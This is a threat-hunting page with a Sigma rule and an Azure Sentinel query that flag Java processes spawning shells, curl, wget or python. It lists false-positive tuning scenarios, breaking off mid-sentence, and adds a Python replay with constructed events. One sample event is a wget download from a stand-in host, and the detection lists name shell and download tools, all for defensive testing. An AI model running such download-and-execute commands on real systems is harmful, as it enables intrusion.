Adversaries may use Java processes to spawn suspicious child processes as part of command and control or payload execution. SOC teams should proactively hunt for this behavior in Azure Sentinel to identify potential malware or persistent access mechanisms leveraging Java-based attack vectors.
Detection Rule
title: Suspicious Java Children Processes
id: d292e0af-9a18-420c-9525-ec0ac3936892
status: test
description: Detects java process spawning suspicious children
references:
    - https://www.tecmint.com/different-types-of-linux-shells/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-06-03
tags:
    - attack.execution
    - attack.t1059
logsource:
    category: process_creation
    product: linux
detection:
    selection:
        ParentImage|endswith: '/java'
        CommandLine|contains:
            - '/bin/sh'
            - 'bash'
            - 'dash'
            - 'ksh'
            - 'zsh'
            - 'csh'
            - 'fish'
            - 'curl'
            - 'wget'
            - 'python'
    condition: selection
falsepositives:
    - Unknown
level: high
imProcessCreate
| where (ParentProcessName endswith "/java" or ActingProcessName endswith "/java")
    and (TargetProcessCommandLine contains "/bin/sh"
        or TargetProcessCommandLine contains "bash"
        or TargetProcessCommandLine contains "dash"
        or TargetProcessCommandLine contains "ksh"
        or TargetProcessCommandLine contains "zsh"
        or TargetProcessCommandLine contains "csh"
        or TargetProcessCommandLine contains "fish"
        or TargetProcessCommandLine contains "curl"
        or TargetProcessCommandLine contains "wget"
        or TargetProcessCommandLine contains "python")
Scenario: A system administrator is running a scheduled backup job using java -jar backup-tool.jar which legitimately spawns a child process to compress files with gzip.
Filter/Exclusion: Exclude processes where the parent is a known backup tool or where the child process is gzip and the parent process name contains “backup”.
Scenario: A developer is using java to run a test harness that spawns a child process to execute a unit test using junit or mvn test.
Filter/Exclusion: Exclude processes where the parent is a test framework (e.g., mvn, junit, testng) and the child process is a known testing tool.
Scenario: A DevOps pipeline is using java to run a CI/CD job that spawns a child process to execute a script via bash or sh for deployment.
Filter/Exclusion: Exclude processes where the parent is a CI/CD tool (e.g., jenkins, gitlab-runner, github-actions) and the child process is a known scripting interpreter.
Scenario: A system is running a Java-based monitoring tool (e.g., Prometheus, Grafana, Zabbix) that spawns a child process to collect metrics using curl or snmp.
Filter/Exclusion: Exclude processes where the parent is a known monitoring tool and the child process is a known metric collection utility (e.g., curl, snmpwalk).
Scenario: A Java-based application is using ProcessBuilder to invoke a legitimate system utility (e.g., find, grep, rsync) for data processing.
Filter/Exclusion: Exclude processes where the child process is a known system utility and the parent process is a known application (e.g., rsync, `find
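The following added example (not part of the original rule or page) replays the Sigma selection above and the tuning scenarios just listed over a few constructed process-creation events. The exclusion table, the parent command-line tags and the sample process names are assumptions chosen to mirror the scenarios; the sample also shows that a plain `contains 'dash'` match fires on unrelated names such as `dashboard-export`.

```python
import os

# Substrings from the rule's CommandLine|contains list, as given on the page.
SUSPICIOUS_SUBSTRINGS = ("/bin/sh", "bash", "dash", "ksh", "zsh", "csh",
                         "fish", "curl", "wget", "python")

# Hypothetical tuning table built from the page's scenarios: a substring
# expected in the java parent's command line, and the child binaries it is
# allowed to spawn. The names are illustrative assumptions, not real tooling.
EXCLUSIONS = {
    "backup-tool": {"gzip"},             # scheduled backup job
    "jenkins": {"sh", "bash"},           # CI/CD deployment scripts
    "gitlab-runner": {"sh", "bash"},
    "prometheus": {"curl", "snmpwalk"},  # metric collection
}


def matches_rule(event):
    """Sigma selection: parent image ends with '/java' and the child
    command line contains any listed shell, downloader or interpreter."""
    if not event["ParentImage"].endswith("/java"):
        return False
    return any(s in event["CommandLine"] for s in SUSPICIOUS_SUBSTRINGS)


def is_excluded(event):
    """Tuning layer: the parent image is always java, so key the exclusion
    on the parent's command line plus the child image basename."""
    child = os.path.basename(event["Image"])
    return any(tag in event["ParentCommandLine"] and child in allowed
               for tag, allowed in EXCLUSIONS.items())


def evaluate(events):
    """Return the events that match the rule and survive the exclusions."""
    return [e for e in events if matches_rule(e) and not is_excluded(e)]


SAMPLE_EVENTS = [  # constructed telemetry, not from any real host
    {"ParentImage": "/usr/bin/java", "ParentCommandLine": "java -jar jenkins.war",
     "Image": "/bin/bash", "CommandLine": "/bin/bash -c ./deploy.sh"},
    {"ParentImage": "/usr/bin/java", "ParentCommandLine": "java -jar prometheus-agent.jar",
     "Image": "/usr/bin/curl", "CommandLine": "curl http://127.0.0.1:9100/metrics"},
    {"ParentImage": "/usr/bin/java", "ParentCommandLine": "java -jar webapp.jar",
     "Image": "/bin/sh", "CommandLine": "/bin/sh -c 'wget http://example.invalid/x -O /tmp/x'"},
    {"ParentImage": "/usr/bin/java", "ParentCommandLine": "java -jar webapp.jar",
     "Image": "/opt/app/dashboard-export", "CommandLine": "/opt/app/dashboard-export --out /tmp"},
]

if __name__ == "__main__":
    for e in evaluate(SAMPLE_EVENTS):  # prints the two surviving alerts
        print("ALERT:", e["ParentCommandLine"], "->", e["CommandLine"])
```

The first two events match the rule but are suppressed by the tuning table; the last event alerts only because `dash` is a substring of `dashboard`, which is the kind of overmatch to review before raising the rule to a high-severity incident.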